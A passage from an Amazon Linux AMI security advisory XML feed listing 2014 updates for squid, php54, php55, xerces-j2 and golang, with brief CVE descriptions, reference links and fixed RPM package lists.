CVE-2014-0128:
A denial of service flaw was found in the way Squid processed certain HTTPS requests when the SSL Bump feature was enabled. A remote attacker could send specially crafted requests that could cause Squid to crash.
CVE-2013-4115:
A buffer overflow flaw was found in Squid's DNS lookup module. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4115" title="" id="CVE-2013-4115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0128" title="" id="CVE-2014-0128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3609" title="" id="CVE-2014-3609" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0597.html" title="" id="RHSA-2014:0597" type="redhat" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1148.html" title="" id="RHSA-2014:1148" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.1.10" release="29.17.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.10-29.17.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="29.17.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.10-29.17.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.10" release="29.17.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.10-29.17.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="29.17.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.10-29.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-434</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-434: important priority package update for php54</title><issued date="2014-10-28 17:09:00" /><updated date="2014-11-01 14:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3670:
1154502:
CVE-2014-3670 php: heap corruption issue in exif_thumbnail()
CVE-2014-3669:
1154500:
CVE-2014-3669 php: integer overflow in unserialize()
CVE-2014-3668:
1154503:
CVE-2014-3668 php: xmlrpc ISO8601 date format parsing out-of-bounds read in mkgmtime()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3668" title="" id="CVE-2014-3668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669" title="" id="CVE-2014-3669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670" title="" id="CVE-2014-3670" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-fpm" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.34-1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-435</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-435: important priority package update for php55</title><issued date="2014-10-28 17:10:00" /><updated date="2014-11-01 14:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3670:
1154502:
CVE-2014-3670 php: heap corruption issue in exif_thumbnail()
CVE-2014-3669:
1154500:
CVE-2014-3669 php: integer overflow in unserialize()
CVE-2014-3668:
1154503:
CVE-2014-3668 php: xmlrpc ISO8601 date format parsing out-of-bounds read in mkgmtime()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3668" title="" id="CVE-2014-3668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669" title="" id="CVE-2014-3669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670" title="" id="CVE-2014-3670" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.18-1.92.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.18" release="1.92.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.18-1.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-436</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-436: medium priority package update for xerces-j2</title><issued date="2014-10-28 17:13:00" /><updated date="2014-11-01 14:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4002:
A resource consumption issue was found in the way Xerces-J handled XML declarations. A remote attacker could use an XML document with a specially crafted declaration using a long pseudo-attribute name that, when parsed by an application using Xerces-J, would cause that application to use an excessive amount of CPU.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002" title="" id="CVE-2013-4002" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1319.html" title="" id="RHSA-2014:1319" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xerces-j2-javadoc-apis" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-javadoc-xni" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-javadoc-other" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-demo" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-demo-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-scripts" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-scripts-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package><package name="xerces-j2-javadoc-impl" version="2.7.1" release="12.7.19.amzn1" epoch="0" arch="noarch"><filename>Packages/xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-437</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-437: medium priority package update for golang</title><issued date="2014-10-28 17:15:00" /><updated date="2014-11-01 14:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7189:
crpyto/tls in Go 1.1 before 1.3.2, when SessionTicketsDisabled is enabled, allows man-in-the-middle attackers to spoof clients via unspecified vectors.
1147324:
CVE-2014-7189 golang: TLS client authentication issue fixed in version 1.3.2
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7189" title="" id="CVE-2014-7189" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-pkg-netbsd-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-vim" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-vim-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang" version="1.3.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.3.3-1.7.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-linux-arm" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-arm-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-plan9-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-386" version="1.3.3" release="1.7.amzn1" epoch="0" 